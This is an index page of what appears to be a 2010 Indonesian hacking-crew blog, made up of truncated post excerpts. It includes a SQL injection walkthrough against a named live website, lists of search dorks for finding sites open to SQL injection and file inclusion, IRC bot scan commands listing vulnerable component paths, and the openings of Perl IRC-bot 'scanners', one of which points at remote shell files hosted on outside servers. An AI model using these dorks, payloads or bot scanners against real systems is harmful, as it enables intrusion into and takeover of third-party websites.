Manual SQL Injection Tutorial
By: arianom Kill-9 Crew
Target: http://www.natoleo.com/Content.php?id=14
1. Check a website for the bug by appending a single quote ( ' ) to the end of the URL; it turns out there is a bug on http://www.natoleo.com. http://www.natoleo.com/Content.php?id=14' shows the error message: MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by a.content_order Asc' at line 1)
2. To find...
Wednesday, December 22, 2010
Wednesday, December 15, 2010
Special Bug SQL Injection
Author: kill-9 | Posted at: 11:39 PM | Filed Under: SQL

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning:...
Dork XML
Author: kill-9 | Posted at: 11:24 PM | Filed Under: LFI

!xml active/components/xmlrpc/client.php?c[components]= /Pindorama/
!xml /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= "com_sitemap"
!xml /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= "com_videodb"
!xml /ch_readalso.php?read_xml_include= "Copyrights ? 2005 Belgische Federale Overheidsdiensten"
!xml /include/monitoring/engine/MakeXML.php?fileOreonConf= "oreon.conf.php"
!xml /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf= "common-Func-ACL.php"
!xml /sitemap.xml.php?dir[classes]=...
Sunday, December 12, 2010
LFI Dork
Author: kill-9 | Posted at: 11:21 PM | Filed Under: LFI

!lfi submitComment.php?DOCUMENT_ROOT= submitComment.php
!lfi index.php?option=com_beeheard&controller= index.php?option=com_beeheard
!lfi index.php?option=com_arcadegames&controller= option=com_arcadegames
!lfi index.php?option=com_flashgames&controller= "option=com_flashgames"
!lfi /index.php?option=com_addressbook&controller= "option=com_addressbook"
!lfi index.php?option=com_advertising&controller= index.php?option=com_advertising
!lfi /index.php?option=com_cvmaker&controller= /index.php?option=com_cvmaker
!lfi...
Friday, December 10, 2010
Joomla LFI dork
Author: kill-9 | Posted at: 11:23 PM | Filed Under: LFI

!lfi /index.php?option=com_myblog&Itemid=12&task= "com_myblog"
!lfi /index.php?option=com_juliaportfolio&controller= "com_juliaportfolio"
!lfi /index.php?option=com_sbsfile&controller= "com_sbsfile"
!lfi /index.php?option=com_rokdownloads&controller= "com_rokdownloads"
!lfi /index.php?option=com_sectionex&controller= "com_sectionex"
!lfi /index.php?option=com_ganalytics&controller= "com_ganalytics"
!lfi /index.php?option=com_janews&controller= "com_janews"
!lfi /index.php?option=com_linkr&controller=...
Thursday, November 18, 2010
LFi Scanner v1.0
#!/usr/bin/perl######################################## Apache Conf Scanner v1.0 ## ReCoded by arianom ## d00r[at]telkom[dot]net ## Copyleft © 2009 VopCrew UnderGrounD ########################################use HTTP::Request;use LWP::UserAgent;use IO::Socket;use IO::Select;use Socket;my $fakeproc = $ARGV[6];$ircserver = $ARGV[0] unless $ircserver;my $ircport = $ARGV[1];my $nickname = $ARGV[2];my $ident = $ARGV[3];my $channel = '#'.$ARGV[4];my $runner = $ARGV[5];my...
Friday, November 12, 2010
e107 New Scanner ByroeNet
#!/usr/bin/perl$powered="ByroeNet";$mail="admin(at)byroe.net";#######################################################use HTTP::Request;use LWP::UserAgent;use IO::Socket;use IO::Select;use IO::Socket::INET;use Socket;use HTTP::Request::Common;use LWP::Simple;use LWP 5.64;use HTTP::Request::Common qw(POST);use Digest::MD5 qw(md5_hex);use MIME::Base64;my $fakeproc = "/usr/sbin/apache2 -k start";$ircserver = "irc.kill-9.server.or.id";my $ircport = "6667";my $nickname = "loveYou";my $ident = "love";my...
Thursday, November 11, 2010
BaMbY LFI Scanner
#!/usr/bin/perl$powered="BaMbY";$mail="admin(at)bamby.web.id"; ################################################################################# ## 28/05/2010 ## Author : BaMbY ## Team : Irc.Konthol.Net ## WebSite : http://www.bamby.web.id ## Contact : admin(at)bamby.web.id ...
Wednesday, November 10, 2010
Havij v1.1: Advanced SQL Injection
Author: kill-9 | Posted at: 11:37 PM | Filed Under: Hacking Stuff, SQL


Havij is an automated SQL Injection tool that helps penetration testers find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. Using this software, a user can fingerprint the back-end database, retrieve DBMS users and password hashes, dump tables and columns, fetch data from the database, run SQL statements and even access...
Tuesday, October 12, 2010
bug SQLi
Author: kill-9 | Posted at: 11:38 PM | Filed Under: SQL

Here's something for finding targets whose websites have an SQLi bug:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=...
RFI & LFI scanner
Author: kill-9 | Posted at: 11:28 PM | Filed Under: LFI

***************************AUTOR: arianomDATE :Juli 2009LINGUAGE: perl (.pl)**************************use IO::Socket::INET;use HTTP::Request;use LWP::UserAgent;require LWP;$|++;######################################################### CONFIGURATION //#######################################################$auth = "arianom";$authmail = "arianom\@live.it";my $id = "http://nuthome.net/xe/idosyris.txt??"; my $shell = "http://www.soraperra.com/canazeiinforma/ssh.txt??";my $ircd = "irc.gotakan.h4ck.la";...
Monday, February 22, 2010
Hack Mozilla Firefox, increasing internet speed
Author: kill-9 | Posted at: 7:45 AM | Filed Under: Hacking Trick

Hacking methods really do just keep getting cooler over time; so many things can be hacked, from credit cards all the way to the Pentagon's security system, which hackers can break into too. Here I won't go so far as to talk about the difficult hacks; here I will give a way to hack Mozilla Firefox to increase your internet speed so that it is much faster. This tip for speeding up the internet applies not only to personal computers but can also be used to speed up the internet at an internet cafe. Now, straight...
Sunday, February 21, 2010
Deadly Commands in Linux
Author: kill-9 | Posted at: 12:46 AM | Filed Under: Hacking Trick

Linux is well known for the security of its use. Viruses that are good friends with Windows, for example, have to find very complicated ways to get into Linux. Even so, this transient world (hehehe…) is home to all kinds of people with all kinds of characters. Criminals and psychopaths may disguise themselves on various forums and mailing lists and, instead of offering a solution, may make you suffer....
Mixed Bug Dorks
Author: kill-9 | Posted at: 12:21 AM | Filed Under: Bug Dork

!scan ///////?cmd&file= "List Users with Pics only?"
!scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= /MODx/
!scan /include/scripts/export_batch.inc.php?DIR= ModernBill
!scan /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path= technote7
!scan /?sIncPath= "BoonEx- Community Software; Dating And Social Networking Scripts; Video Chat And More."
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement - © 2002-2004 by Christian Scheb - Stylemotion.de
!scan /parse/parser.php?WN_BASEDIR=...